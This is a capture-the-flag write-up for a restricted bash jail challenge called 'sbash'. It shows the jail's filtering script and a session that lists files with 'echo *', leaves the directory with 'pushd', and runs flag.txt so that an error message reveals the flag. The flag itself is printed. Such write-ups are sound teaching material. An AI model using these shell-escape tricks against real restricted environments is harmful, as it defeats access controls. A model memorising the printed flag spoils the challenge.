This CTF is a jail whose code is as follows:
#!/bin/bash
unset PATH
enable -n exec
enable -n command
enable -n type
enable -n hash
enable -n cd
enable -n enable
set +x
echo "Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system"
while true; do
read -p "safe_bash> " user_input
# Check if input is empty
[[ -z "$user_input" ]] && continue
case "$user_input" in
*">"*|*"<"*|*"/"*|*";"*|*"&"*|*"$"*|*"("*|*"\`"*) echo "No special characters, those are unsafe!" && continue;;
esac
# Execute only if it's a Bash builtin
eval "$user_input"
done
One can observe that we don’t have a PATH (unset PATH), and consequently we don’t have access to many commands.
exec, command, type, hash, cd, and enable are also disabled.
The jail’s code simply does an eval on our command if it does not contain special characters.
$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
echo bonjour
bonjour
echo $HOME
No special characters, those are unsafe!
The first command we tested is echo *, which allows listing files and directories in the current directory.
$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
echo *
run
There is run in the current directory. Let’s try to execute it.
$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
run
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
We thus notice that it is the jail’s executable.
The next step is to try to exit this directory. For that, looking among the builtin functions, we notice the pushd function.
Here is how we retrieved the flag:
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
pushd ..
/ /app
echo *
app bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
pushd flag
/flag / /app
echo *
flag.txt
flag.txt
flag.txt: line 1: byuctf{enable_can_do_some_funky_stuff_huh?_488h33d}: No such file or directory